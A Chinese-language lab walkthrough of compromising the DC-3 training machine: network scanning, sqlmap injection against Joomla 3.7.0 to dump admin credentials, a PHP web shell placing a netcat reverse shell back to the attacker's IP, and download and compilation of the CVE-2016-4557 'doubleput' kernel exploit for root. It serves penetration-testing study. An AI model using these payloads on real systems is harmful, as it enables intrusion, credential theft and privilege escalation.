一、信息收集
查询本机ip及目标靶机ip
本机ip:192.168.56.104,利用nmap查询同网段存活的ip,或者使用arp-scan -l
![](https://img-blog.csdnimg.cn/img_convert/01975ecfdf7944898d7dae9e25682087.png)
靶机ip为:192.168.56.112,下一步收集靶机开放的端口信息
收集靶机开放端口
输入nmap -sS -sV -T5 -A 192.168.56.112 搜索相应开放的端口及服务还有版本
![](https://img-blog.csdnimg.cn/img_convert/2f51bf83b7a748cea16c95892cfb55ba.png)
发现只有80端口,同时也发现了个Joomla的cms框架,该框架最新的cve-2023-23752,将在后面更新,一个未授权访问漏洞,Joomla! CMS 版本4.0.0 - 4.2.7中由于对web 服务端点访问限制不当,可能导致未授权访问Rest API,造成敏感信息泄露(如数据库账号密码等)。鉴于该漏洞影响较大,建议客户尽快做好自查及防护。
对应端口进行尝试
这里介绍一个新工具joomscan,后面将会和wpscan同时更新一篇文章,这里就先利用了
输入joomscan --url 192.168.56.112
![](https://img-blog.csdnimg.cn/img_convert/ba173933c4bb45a9b0ff8349c01e0792.png)
检测到了很多目录,浏览器输入地址后发现
![](https://img-blog.csdnimg.cn/img_convert/f42b9a8dd1d3400894d10cb493e47baf.png)
这里说,该靶机仅有一个flag,应该是需要提权后才可以查看的到,这边发现了个登录框,去漏洞库里查找下看是否存在sql注入的漏洞
二、Web渗透
输入searchsploit joomla 3.7.0 -w,如果不知道如何利用,可以看后面的url,里面有方式
![](https://img-blog.csdnimg.cn/img_convert/526a835526494e4a80c8b0576edb93e7.png)
直接上sqlmap,进行注入
sqlmap -u " http://192.168.56.112/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
![](https://img-blog.csdnimg.cn/img_convert/dd88158a50ec4b4a86c242df9dc8e570.png)
发现了joomladb的数据库,继续报数据表
sqlmap -u " http://192.168.56.112/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables
![](https://img-blog.csdnimg.cn/img_convert/0314212e4adf4dab96228e5d1d30600d.png)
爆出来了n多张表,这里,根据users表,爆出用户名和密码
sqlmap -u " http://192.168.56.112/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -T '#__users' -C name,password --dump
![](https://img-blog.csdnimg.cn/img_convert/1bc1fbd9781844a8934440dd11a44eee.png)
发现了admin用户和它的password,将password复制粘贴到一个txt文档中,进行密码破解
![](https://img-blog.csdnimg.cn/img_convert/c27fe4a887164bdc9e27e2b5f5b8d9b8.png)
我这边已经破解过了,用户名admin、密码snoopy
![](https://img-blog.csdnimg.cn/img_convert/9a36a87bd8524202b8541b15845577e0.png)
![](https://img-blog.csdnimg.cn/img_convert/9a9f25c502614734abc88b3ff5d2dcf6.png)
登陆后,就要开始寻找有没有可以getshell的地方,这类的cms肯定是有上传文件的地方,这里可以上传一个一句话木马,用蚁剑进行连接,也可以写一个php,反弹shell到我们的攻击机上,这边,经过寻找发现了有个templates的beez3的目录
![](https://img-blog.csdnimg.cn/img_convert/05877e0b8d8f42c0b8bbef2394df9bdb.png)
![](https://img-blog.csdnimg.cn/img_convert/a87eda1fd4054b0f8a48dab45a6ea233.png)
![](https://img-blog.csdnimg.cn/img_convert/810fda73debf4e9dafb75ea69b82d29a.png)
新建个shell.php文件,然后去网上找个反弹shell脚本或者自己简单的写一个
<?php
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.104 4444 >/tmp/f');
?>
然后保存该文件,在终端nc -vlp 4444端口,网页访问/templates/beez3/shell.php,即可反弹一个低权限的shell,然后键入
python -c 'import pty;pty.spawn("/bin/bash")'
![](https://img-blog.csdnimg.cn/img_convert/425007dbc2314d54a5ac1b7e1ed0be63.png)
获取到了低权限的下一步就是提权了,首先搜集有关靶机的信息,输入
uname -a
lsb_release -a
![](https://img-blog.csdnimg.cn/img_convert/e710f64df0214c68a74745f7d3313ac3.png)
发现ubuntu 16.04 4.4.0,在本地终端搜索相关的exp
searchsploit ubuntu 16.04 4.4.x -w
![](https://img-blog.csdnimg.cn/img_convert/98ec700565ce49eca9c4eb7c7c6b192e.png)
打开后面的url,可以知晓如何使用该exp
![](https://img-blog.csdnimg.cn/img_convert/347caff9d82845f599aa17cfaa9921c3.png)
![](https://img-blog.csdnimg.cn/img_convert/eadfbe5ad9d346e8aa124f04cc3327bb.png)
下载这个39772.zip到本地,并且解压
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
在本地开启http.server服务,在shell中下载攻击机上下载的39772.zip压缩包
![](https://img-blog.csdnimg.cn/img_convert/2710fd62120943e6bfec030f8722ec29.png)
![](https://img-blog.csdnimg.cn/img_convert/b432a760be72409cb23702d10559313d.png)
使用unzip解压后得到39772文件夹,里面还有两个tar的压缩包,使用tar -xvf exploit.tar
解压后进入该文件夹,运行./compile.sh,会编译出doubleput可执行文件,然后./doubleput即可提权为root
![](https://img-blog.csdnimg.cn/img_convert/6bc339a91ef042ba9eed1c04ea68a30e.png)
![](https://img-blog.csdnimg.cn/img_convert/b9083ff5744d4d0b8651ba7d9b0211ee.png)
在root目录下即可获得flag,本次DC项目的第三台靶机渗透结束。
注意:Linux kernel replace_map_fd_with_map_ptr拒绝服务漏洞(CVE-2016-4557)
Linux Kernel是Linux操作系统的内核。
Linux kernel 4.5.5之前版本,kernel/bpf/verifier.c/replace_map_fd_with_map_ptr未正确维护fd数据结构,存在安全漏洞,可使本地用户造成拒绝服务或提升权限。
每天学习一丢丢,进步一丢丢!!